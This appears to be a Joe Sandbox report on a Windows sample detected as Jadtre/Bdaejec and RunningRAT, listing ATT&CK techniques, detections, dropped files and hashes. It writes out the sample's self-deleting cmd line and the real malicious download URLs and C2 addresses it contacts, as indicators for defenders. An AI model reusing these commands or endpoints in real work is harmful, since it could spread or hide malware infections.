            Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeAPI call chain: ExitProcess graph end nodegraph_1-1028
            Source: C:\Windows\SysWOW64\SySyeu.exeAPI call chain: ExitProcess graph end nodegraph_7-2030
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E15E4F LdrResolveDelayLoadedAPI,7_2_00E15E4F
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E125B2 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,7_2_00E125B2
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeCode function: 0_2_00401B6B LoadLibraryA,GetProcAddress,__p__pgmptr,sprintf,GetCurrentProcess,SetPriorityClass,GetCurrentThread,SetThreadPriority,ShellExecuteA,0_2_00401B6B
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeCode function: 0_2_0040C044 mov eax, dword ptr fs:[00000030h]0_2_0040C044
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E13F6B mov esi, dword ptr fs:[00000030h]7_2_00E13F6B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_10003D5D FreeLibrary,free,VirtualFree,GetProcessHeap,HeapFree,3_2_10003D5D
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E161C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00E161C0
            Source: C:\Windows\SysWOW64\SySyeu.exeCode function: 7_2_00E16510 SetUnhandledExceptionFilter,7_2_00E16510
            Source: C:\Users\user\Desktop\gE4NVCZDRk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\gE4NVCZDRk.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 1Jump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6180 -ip 6180Jump to behavior
            Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6180 -s 1456Jump to behavior
            Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,1_2_003C1718
            Source: C:\Users\user\AppData\Local\Temp\XekSuT.exeCode function: 1_2_003C139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_003C139F
            Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: gE4NVCZDRk.exeBinary or memory string: 360tray.exe
            Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Yara detected Bdaejec
            Source: Yara matchFile source: Process Memory Space: XekSuT.exe PID: 6180, type: MEMORYSTR
            Yara detected RunningRAT
            Source: Yara matchFile source: gE4NVCZDRk.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1680620714.0000000000403000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: gE4NVCZDRk.exe PID: 7112, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Bdaejec
            Source: Yara matchFile source: Process Memory Space: XekSuT.exe PID: 6180, type: MEMORYSTR
            Yara detected RunningRAT
            Source: Yara matchFile source: gE4NVCZDRk.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.gE4NVCZDRk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1680620714.0000000000403000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: gE4NVCZDRk.exe PID: 7112, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts            		12
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		2
            Obfuscated Files or Information            		11
            Input Capture            		11
            System Time Discovery            		1
            Taint Shared Content            		1
            Archive Collected Data            		2
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		1
            Valid Accounts            		1
            Valid Accounts            		12
            Software Packing            		LSASS Memory5
            File and Directory Discovery            		Remote Desktop Protocol11
            Input Capture            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts12
            Service Execution            		22
            Windows Service            		11
            Access Token Manipulation            		1
            Timestomp            		Security Account Manager4
            System Information Discovery            		SMB/Windows Admin SharesData from Network Shared Drive11
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook22
            Windows Service            		1
            DLL Side-Loading            		NTDS131
            Security Software Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script13
            Process Injection            		11
            File Deletion            		LSA Secrets1
            Virtualization/Sandbox Evasion            		SSHKeylogging12
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
            Masquerading            		Cached Domain Credentials13
            Process Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Valid Accounts            		DCSync11
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Modify Registry            		Proc Filesystem1
            Remote System Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadow1
            System Network Configuration Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
            Access Token Manipulation            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd13
            Process Injection            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
            Indicator Removal            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544387 Sample: gE4NVCZDRk.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 100 50 ddos.dnsnb8.net 2->50 58 Suricata IDS alerts for network traffic 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus detection for dropped file 2->62 64 11 other signatures 2->64 8 gE4NVCZDRk.exe 5 3 2->8         started        12 svchost.exe 1 2->12         started        14 svchost.exe 2->14         started        16 svchost.exe 3 8 2->16         started        signatures3 process4 file5 44 C:\Users\user\AppData\Local\Temp\XekSuT.exe, PE32 8->44 dropped 46 C:\Users\user\AppData\Local\...\6011859.dll, PE32 8->46 dropped 78 Found evasive API chain (may stop execution after checking mutex) 8->78 80 Self deletion via cmd or bat file 8->80 18 XekSuT.exe 22 8->18         started        23 cmd.exe 1 8->23         started        48 C:\Windows\SysWOW64\SySyeu.exe, PE32 12->48 dropped 82 Drops executables to the windows directory (C:\Windows) and starts them 12->82 25 SySyeu.exe 1 12->25         started        84 Checks if browser processes are running 14->84 27 WerFault.exe 2 16->27         started        signatures6 process7 dnsIp8 52 ddos.dnsnb8.net 44.221.84.105, 49730, 49731, 49732 AMAZON-AESUS United States 18->52 38 C:\Program Files\7-Zip\Uninstall.exe, PE32 18->38 dropped 40 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 18->40 dropped 42 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 18->42 dropped 66 Antivirus detection for dropped file 18->66 68 Multi AV Scanner detection for dropped file 18->68 70 Detected unpacking (changes PE section rights) 18->70 76 2 other signatures 18->76 29 WerFault.exe 21 16 18->29         started        72 Uses ping.exe to sleep 23->72 74 Uses ping.exe to check the status of other devices and networks 23->74 31 PING.EXE 1 23->31         started        34 conhost.exe 23->34         started        54 119.91.152.151, 49735, 49743, 8321 CNNIC-QCN-APQingdaoCableTVNetworkCenterCN China 25->54 36 WMIADAP.exe 20 10 27->36         started        file9 signatures10 process11 dnsIp12 56 127.0.0.1 unknown unknown 31->56

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            gE4NVCZDRk.exe97%ReversingLabsWin32.Virus.Jadtre
            gE4NVCZDRk.exe100%AviraW32/Jadtre.B
            gE4NVCZDRk.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\XekSuT.exe100%AviraTR/Dldr.Small.Z.haljq
            C:\Users\user\AppData\Local\Temp\6011859.dll100%AviraBDS/Backdoor.Gen7
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
            C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
            C:\Users\user\AppData\Local\Temp\XekSuT.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\6011859.dll100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
            C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
            C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\6011859.dll96%ReversingLabsWin32.Backdoor.Venik
            C:\Users\user\AppData\Local\Temp\XekSuT.exe97%ReversingLabsWin32.Trojan.Skeeyah
            C:\Windows\SysWOW64\SySyeu.exe0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://upx.sf.net0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ddos.dnsnb8.net
            		44.221.84.105
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://ddos.dnsnb8.net:799/cj//k3.rartrue
                		unknown
                http://ddos.dnsnb8.net:799/cj//k2.rartrue
                  		unknown
                  http://ddos.dnsnb8.net:799/cj//k5.rartrue
                    		unknown
                    http://ddos.dnsnb8.net:799/cj//k1.rartrue
                      		unknown
                      http://ddos.dnsnb8.net:799/cj//k4.rartrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://ddos.dnsnb8.net:799/cj//k1.rarmOgXekSuT.exe, 00000001.00000002.1891528876.000000000153E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://ddos.dnsnb8.net:799/cj//k4.rar?XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://www.scintilla.org/scite.rngSciTE.exe.1.drfalse
                              		unknown
                              http://www.rftp.comJosiahSciTE.exe.1.drfalse
                                		unknown
                                http://ddos.dnsnb8.net/=XekSuT.exe, 00000001.00000002.1891528876.000000000155C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://www.activestate.comSciTE.exe.1.drfalse
                                    		unknown
                                    http://www.activestate.comHolgerSciTE.exe.1.drfalse
                                      		unknown
                                      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEXekSuT.exe, 00000001.00000003.1681276523.00000000014D0000.00000004.00001000.00020000.00000000.sdmp, XekSuT.exe, 00000001.00000002.1891247732.00000000003C3000.00000002.00000001.01000000.00000004.sdmpfalse
                                        		unknown
                                        http://upx.sf.netAmcache.hve.1.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.rftp.comSciTE.exe.1.drfalse
                                          		unknown
                                          http://ddos.dnsnb8.net:799/cj//k5.rar-XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.baanboard.comBrendonSciTE.exe.1.drfalse
                                              		unknown
                                              https://www.smartsharesystems.com/SciTE.exe.1.drfalse
                                                		unknown
                                                http://www.scintilla.orgSciTE.exe.1.drfalse
                                                  		unknown
                                                  http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
                                                    		unknown
                                                    https://www.smartsharesystems.com/MortenSciTE.exe.1.drfalse
                                                      		unknown
                                                      http://ddos.dnsnb8.net/eXekSuT.exe, 00000001.00000002.1891528876.000000000155C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.develop.comSciTE.exe.1.drfalse
                                                          		unknown
                                                          http://www.lua.orgSciTE.exe.1.drfalse
                                                            		unknown
                                                            http://ddos.dnsnb8.net:799/cj//k2.rarAXekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://ddos.dnsnb8.net/XekSuT.exe, 00000001.00000002.1891528876.000000000155C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://ddos.dnsnb8.net:799/cj//k5.rarCXekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://ddos.dnsnb8.net:799/cj//k4.rarrXekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://www.spaceblue.comSciTE.exe.1.drfalse
                                                                      		unknown
                                                                      http://www.baanboard.comSciTE.exe.1.drfalse
                                                                        		unknown
                                                                        http://www.develop.comDeepakSciTE.exe.1.drfalse
                                                                          		unknown
                                                                          http://ddos.dnsnb8.net:799/cj//k5.rar=1XekSuT.exe, 00000001.00000002.1891528876.0000000001592000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            119.91.152.151
                                                                            		unknownChina
                                                                            		24143CNNIC-QCN-APQingdaoCableTVNetworkCenterCNtrue
                                                                            44.221.84.105
                                                                            		ddos.dnsnb8.netUnited States
                                                                            		14618AMAZON-AESUStrue

                                                                            Private

                                                                            IP
                                                                            127.0.0.1

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1544387
                                                                            Start date and time:2024-10-29 10:58:06 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 7m 52s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:15
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:gE4NVCZDRk.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:02b3757b29002a8fcabd9afaebf1f7d3.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.spre.bank.troj.evad.winEXE@24/33@1/3
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 37
                                                                            • Number of non-executed functions: 93
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • VT rate limit hit for: gE4NVCZDRk.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            05:59:18API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                            05:59:34API Interceptor9763412x Sleep call for process: svchost.exe modified
                                                                            05:59:41API Interceptor1517x Sleep call for process: SySyeu.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            119.91.152.151uHmFQqHIIA.exeGet hashmaliciousRunningRATBrowse
                                                                              2Syx0ZLsgo.exeGet hashmaliciousRunningRATBrowse
                                                                                I6A09pYeTA.exeGet hashmaliciousRunningRATBrowse
                                                                                  SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                                    harst.exeGet hashmaliciousRunningRATBrowse
                                                                                      sIhckM7o37.exeGet hashmaliciousGh0stCringe RunningRATBrowse
                                                                                        44.221.84.105AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                        • npukfztj.biz/clexsjcapi
                                                                                        SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                        • banwyw.biz/awjdluu
                                                                                        AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                        • uphca.biz/yfvdkcw
                                                                                        ib.exeGet hashmaliciousBdaejecBrowse
                                                                                        • ddos.dnsnb8.net:799/cj//k1.rar
                                                                                        RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • jhvzpcfg.biz/qsmoxnmhx
                                                                                        samoanaliz-uroka-okruzhayuschij-mir-po-teme-kakie-byvayut-zhivotnye.exeGet hashmaliciousUnknownBrowse
                                                                                        • wxanalytics.ru/net.exe
                                                                                        balet-spyaschaya-krasavitsa.exeGet hashmaliciousUnknownBrowse
                                                                                        • wxanalytics.ru/net.exe
                                                                                        http://44.221.84.105Get hashmaliciousUnknownBrowse
                                                                                        • 44.221.84.105/favicon.ico
                                                                                        PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • neazudmrq.biz/yewbnslbiwmcquj
                                                                                        PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • banwyw.biz/wrjeoyp

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        ddos.dnsnb8.netib.exeGet hashmaliciousBdaejecBrowse
                                                                                        • 44.221.84.105
                                                                                        SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
                                                                                        • 44.221.84.105
                                                                                        1hdqYXYJkr.exeGet hashmaliciousBdaejecBrowse
                                                                                        • 44.221.84.105
                                                                                        7Y18r(193).exeGet hashmaliciousBdaejec, StealcBrowse
                                                                                        • 44.221.84.105
                                                                                        BUG32.exeGet hashmaliciousBdaejecBrowse
                                                                                        • 44.221.84.105
                                                                                        7Y18r(212).exeGet hashmaliciousBdaejecBrowse
                                                                                        • 44.221.84.105
                                                                                        7Y18r(216).exe.dllGet hashmaliciousBdaejec, SalityBrowse
                                                                                        • 44.221.84.105
                                                                                        A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
                                                                                        • 44.221.84.105
                                                                                        BUG32.exeGet hashmaliciousBdaejecBrowse
                                                                                        • 44.221.84.105

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        AMAZON-AESUShttps://dvhpkbq.sharing.bublup.com/mybublup/#/mystuff/001-f-cb6f5ea2-07bf-4021-a767-4b4547f8c10b/mixed?lid=001-si-_s1J1-rGiVhhGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 3.213.224.128
                                                                                        la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                        • 54.30.10.248
                                                                                        la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                        • 3.94.160.165
                                                                                        arm5.elfGet hashmaliciousUnknownBrowse
                                                                                        • 54.139.27.107
                                                                                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                        • 54.221.133.31
                                                                                        la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                        • 100.25.27.129
                                                                                        la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                        • 44.210.77.34
                                                                                        la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                        • 54.129.85.119
                                                                                        https://ws.onehub.com/files/3wbmh4dnGet hashmaliciousUnknownBrowse
                                                                                        • 54.173.137.115
                                                                                        https://filerit.com/pi-240924.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 50.16.37.48
                                                                                        CNNIC-QCN-APQingdaoCableTVNetworkCenterCNla.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                        • 119.91.25.3
                                                                                        byte.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        • 119.91.250.10
                                                                                        la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                        • 115.174.103.181
                                                                                        la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                        • 220.112.52.250
                                                                                        uHmFQqHIIA.exeGet hashmaliciousRunningRATBrowse
                                                                                        • 119.91.152.151
                                                                                        SecuriteInfo.com.Variant.Giant.Zusy.6.12808.9954.exeGet hashmaliciousUnknownBrowse
                                                                                        • 119.91.67.107
                                                                                        novo.x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                        • 60.232.182.139
                                                                                        2Syx0ZLsgo.exeGet hashmaliciousRunningRATBrowse
                                                                                        • 119.91.152.151
                                                                                        I6A09pYeTA.exeGet hashmaliciousRunningRATBrowse
                                                                                        • 119.91.152.151
                                                                                        SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                                        • 119.91.152.151

                                                                                        JA3 Fingerprints

                                                                                        No context

                                                                                        Dropped Files

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Users\user\AppData\Local\Temp\XekSuT.exeib.exeGet hashmaliciousBdaejecBrowse
                                                                                          SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
                                                                                            8VB4lVuZk3.exeGet hashmaliciousBdaejecBrowse
                                                                                              biKy3nZEyJ.exeGet hashmaliciousBdaejecBrowse
                                                                                                biKy3nZEyJ.exeGet hashmaliciousBdaejecBrowse
                                                                                                  #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeGet hashmaliciousBdaejec, SalityBrowse
                                                                                                    a4#Uff09.exeGet hashmaliciousBdaejec, SalityBrowse
                                                                                                      1.0.0.2.exeGet hashmaliciousBdaejec, SalityBrowse
                                                                                                        log1.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
                                                                                                          log2.exeGet hashmaliciousBabadeda, Bdaejec, NeshtaBrowse
                                                                                                            C:\Users\user\AppData\Local\Temp\6011859.dlluHmFQqHIIA.exeGet hashmaliciousRunningRATBrowse

                                                                                                              Created / dropped Files

                                                                                                              C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):19456
                                                                                                              Entropy (8bit):6.590488550549625
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:1F/S8XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:ycQGPL4vzZq2o9W7GsxBbPr
                                                                                                              MD5:87EBBA9962E0431E9BED32CB7E5DF48A
                                                                                                              SHA1:B5D695A1E4759FF6A2846E1A0E526A2ADF8AE3A2
                                                                                                              SHA-256:8B859F26169ED9EE2DCB671391BE25FD36494FF2B272D359561322131935809C
                                                                                                              SHA-512:502E1B1CA82AA2E35216955FD0508B5CB4EBDB910F930953528E84047B03D71F76403C81647596DCAE2A2D722E91CA9528B12D425158250AFE91EB9F53239943
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................

                                                                                                              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2389504
                                                                                                              Entropy (8bit):6.731338221304018
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                                                                                              MD5:4C118C50DF307996419B06E92163087D
                                                                                                              SHA1:29825FBD6055C6AC06E91293C024C496A6B42439
                                                                                                              SHA-256:CFF2F2A0EAEADA0E77739524E284275912CCBE6E9F34341105E9B7A1C5B8C961
